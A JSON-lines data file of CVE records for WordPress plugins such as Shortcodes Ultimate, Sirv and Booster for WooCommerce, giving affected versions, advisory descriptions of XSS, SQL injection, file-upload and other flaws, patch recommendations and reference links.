{"CVE_ID":"CVE-2024-13573","slug":"zigaform-form-builder-lite","versionImpact":"7.4.7","versionEndExcluding":"7.4.8","description":"The Zigaform \u2013 Form Builder Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zgfm_rfvar' shortcode in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zigaform-form-builder-lite\\\/trunk\\\/modules\\\/formbuilder\\\/controllers\\\/uiform-fb-controller-frontend.php#L366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zigaform-form-builder-lite\\\/trunk\\\/modules\\\/formbuilder\\\/controllers\\\/uiform-fb-controller-frontend.php#L366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768d0ef5-5213-4283-b95e-ddfe0d2196bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/768d0ef5-5213-4283-b95e-ddfe0d2196bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7369","slug":"shortcodes-ultimate","versionImpact":"7.4.2","versionEndExcluding":"7.4.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.4.2. This is due to missing or incorrect nonce validation on the preview function. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.\r\nIn combination with CVE-2025-7354, it leads to Reflected Cross-Site Scripting.","recommendation":"Update to version 7.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/inc\\\/core\\\/generator.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/inc\\\/core\\\/generator.php#L339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5934d1c8-1553-4908-aaab-89d2189eb4cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5934d1c8-1553-4908-aaab-89d2189eb4cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7354","slug":"shortcodes-ultimate","versionImpact":"7.4.2","versionEndExcluding":"7.4.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/button.php#L408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/button.php#L408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/expand.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/expand.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/members.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/members.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/post.php#L116\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/post.php#L116\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/user.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.2\\\/includes\\\/shortcodes\\\/user.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d32cda-bb6d-4ffa-82b9-f2f6e8d4346f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62d32cda-bb6d-4ffa-82b9-f2f6e8d4346f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8015","slug":"shortcodes-ultimate","versionImpact":"7.4.2","versionEndExcluding":"7.4.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded image's 'Title' and 'Slide link' fields in all versions up to, and including, 7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/shortcodes-ultimate\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328729\\\/shortcodes-ultimate\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deba0a29-7fe5-4f94-bee6-9d01e023215e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/deba0a29-7fe5-4f94-bee6-9d01e023215e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3549","slug":"blog2social","versionImpact":"7.4.1","versionEndExcluding":"7.4.2","description":"The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to SQL Injection via the 'b2sSortPostType' parameter in all versions up to, and including, 7.4.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 7.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b472eb8-9808-4a50-b2b4-0b0b3256053f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b472eb8-9808-4a50-b2b4-0b0b3256053f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069574\\\/blog2social\\\/trunk\\\/includes\\\/B2S\\\/Post\\\/Item.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3069574\\\/blog2social\\\/trunk\\\/includes\\\/B2S\\\/Post\\\/Item.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4775","slug":"ajax-load-more","versionImpact":"7.4.0.1","versionEndExcluding":"7.4.1","description":"The WordPress Infinite Scroll \u2013 Ajax Load More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-button-label HTML attribute in all versions up to, and including, 7.4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/tags\\\/7.3.1.2\\\/build\\\/frontend\\\/ajax-load-more.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-load-more\\\/tags\\\/7.3.1.2\\\/build\\\/frontend\\\/ajax-load-more.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/614bdce2-bd87-4516-b1a5-028ffc08b238?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/614bdce2-bd87-4516-b1a5-028ffc08b238?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5567","slug":"shortcodes-ultimate","versionImpact":"7.4.0","versionEndExcluding":"7.4.1","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-url' DOM element attribute in all versions up to, and including, 7.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.0\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/tags\\\/7.4.0\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd67145-5b95-4890-a265-1dd7a029aec6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd67145-5b95-4890-a265-1dd7a029aec6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12330","slug":"wp-database-backup","versionImpact":"7.3","versionEndExcluding":"7.4","description":"The WP Database Backup \u2013 Unlimited Database & Files Backup by Backup for WP plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.3 via publicly accessible back-up files. This makes it possible for unauthenticated attackers to extract sensitive data including all information stored in the database.","recommendation":"Update to version 7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209380%40wp-database-backup&new=3209380%40wp-database-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209380%40wp-database-backup&new=3209380%40wp-database-backup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209387%40wp-database-backup&new=3209387%40wp-database-backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209387%40wp-database-backup&new=3209387%40wp-database-backup&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f36839b-850e-4c39-aa61-4fd7a89cd5bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f36839b-850e-4c39-aa61-4fd7a89cd5bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12300","slug":"ar-for-wordpress","versionImpact":"7.3","versionEndExcluding":"7.4","description":"The AR for WordPress plugin for WordPress is vulnerable to unauthorized double extension file upload due to a missing capability check on the set_ar_featured_image() function in all versions up to, and including, 7.3. This makes it possible for unauthenticated attackers to upload php files leveraging a double extension attack. It's important to note the file is deleted immediately and double extension attacks only work on select servers making this unlikely to be successfully exploited.","recommendation":"Update to version 7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ar-for-wordpress\\\/trunk\\\/includes\\\/ar-add-media.php?rev=3177638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ar-for-wordpress\\\/trunk\\\/includes\\\/ar-add-media.php?rev=3177638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206666%40ar-for-wordpress%2Ftrunk&old=3205240%40ar-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206666%40ar-for-wordpress%2Ftrunk&old=3205240%40ar-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b507369-49f7-4a1d-900b-c7bef40aec96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b507369-49f7-4a1d-900b-c7bef40aec96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13313","slug":"aweber-web-form-widget","versionImpact":"7.3.20","versionEndExcluding":"7.3.21","description":"The AWeber  WordPress plugin through 7.3.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 7.3.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc35b2f4-f1f1-4ed3-91b2-025bd5848b29\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc35b2f4-f1f1-4ed3-91b2-025bd5848b29\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7429","slug":"zotpress","versionImpact":"7.3.12","versionEndExcluding":"7.3.13","description":"The Zotpress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Zotpress_process_accounts_AJAX function in all versions up to, and including, 7.3.12. This makes it possible for authenticated attackers, with Contributor-level access and above, to reset the plugin's settings.","recommendation":"Update to version 7.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f38676b-270f-4b0f-bc98-a14a26b86a50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f38676b-270f-4b0f-bc98-a14a26b86a50?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153348\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153348\\\/zotpress\\\/trunk\\\/lib\\\/admin\\\/admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10855","slug":"sirv","versionImpact":"7.3.0","versionEndExcluding":"7.3.1","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to insufficient validation on the filename parameter of the sirv_upload_file_by_chunks() function and lack of  in all versions up to, and including, 7.3.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.","recommendation":"Update to version 7.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ec09e5-4994-4d23-bf8e-26b64d5303fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ec09e5-4994-4d23-bf8e-26b64d5303fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.8\\\/sirv.php#L4691\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.8\\\/sirv.php#L4691\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186406%40sirv&new=3186406%40sirv&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3186406%40sirv&new=3186406%40sirv&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8500","slug":"shortcodes-ultimate","versionImpact":"7.2.2","versionEndExcluding":"7.3.0","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and including, 7.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 7.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af6e06-4b4c-4f56-a6f8-f98e8f681976?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af6e06-4b4c-4f56-a6f8-f98e8f681976?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/js\\\/shortcodes\\\/index.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171844\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3171844\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6290","slug":"wp-seopress","versionImpact":"7.2","versionEndExcluding":"7.3","description":"The SEOPress WordPress plugin before 7.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78a13958-cd12-4ea8-b326-1e3184da970b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78a13958-cd12-4ea8-b326-1e3184da970b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8512","slug":"w3speedster-wp","versionImpact":"7.26","versionEndExcluding":"7.27","description":"The W3SPEEDSTER plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 7.26 via the 'script' parameter of the hookBeforeStartOptimization() function. This is due to the plugin passing user supplied input to eval(). This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"Update to version 7.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a56eb63-ba5c-4452-8ab9-f5aeaf53adda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a56eb63-ba5c-4452-8ab9-f5aeaf53adda?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3speedster-wp\\\/trunk\\\/w3speedster.php#L740\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3speedster-wp\\\/trunk\\\/w3speedster.php#L740\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175640\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175640\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6392","slug":"sirv","versionImpact":"7.2.7","versionEndExcluding":"7.2.8","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to unauthorized plugin settings modification due to missing capability checks on the plugin functions in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the connected Sirv account to an attacker-controlled one.","recommendation":"Update to version 7.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229490c3-d820-4831-b105-a429512c2c60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229490c3-d820-4831-b105-a429512c2c60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5197\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5338\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.6\\\/sirv.php#L5338\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8480","slug":"sirv","versionImpact":"7.2.7","versionEndExcluding":"7.2.8","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'sirv_save_prevented_sizes' function in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Contributor-level access and above, to exploit the 'sirv_upload_file_by_chunks_callback' function, which lacks proper file type validation, allowing attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e3e628f-b5e7-40fd-9d34-4a3b23e1e0e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e3e628f-b5e7-40fd-9d34-4a3b23e1e0e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/trunk\\\/sirv.php?rev=3103410#L4647\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/trunk\\\/sirv.php?rev=3103410#L4647\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.7\\\/sirv.php#L6331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sirv\\\/tags\\\/7.2.7\\\/sirv.php#L6331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115018\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115018\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5853","slug":"sirv","versionImpact":"7.2.6","versionEndExcluding":"7.2.7","description":"The Image Optimizer, Resizer and CDN \u2013 Sirv plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the sirv_upload_file_by_chanks AJAX action in all versions up to, and including, 7.2.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89b40ec-1952-46e3-a91b-bd38e62f8929?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e89b40ec-1952-46e3-a91b-bd38e62f8929?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103410\\\/sirv\\\/trunk\\\/sirv.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103410\\\/sirv\\\/trunk\\\/sirv.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13708","slug":"woocommerce-jetpack","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in versions 4.0.1 to 7.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/class-wcj-checkout-files-upload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/class-wcj-checkout-files-upload.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f58b3971-e1e4-4337-82a3-99c9079c6696?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f58b3971-e1e4-4337-82a3-99c9079c6696?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13744","slug":"woocommerce-jetpack","versionImpact":"7.2.4","versionEndExcluding":"7.2.5","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the validate_product_input_fields_on_add_to_cart function in versions 4.0.1 to 7.2.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 7.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/input-fields\\\/class-wcj-product-input-fields-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262569\\\/woocommerce-jetpack\\\/trunk\\\/includes\\\/input-fields\\\/class-wcj-product-input-fields-core.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8e1aca8-3d82-4b1a-98c8-29501a377846?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8e1aca8-3d82-4b1a-98c8-29501a377846?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
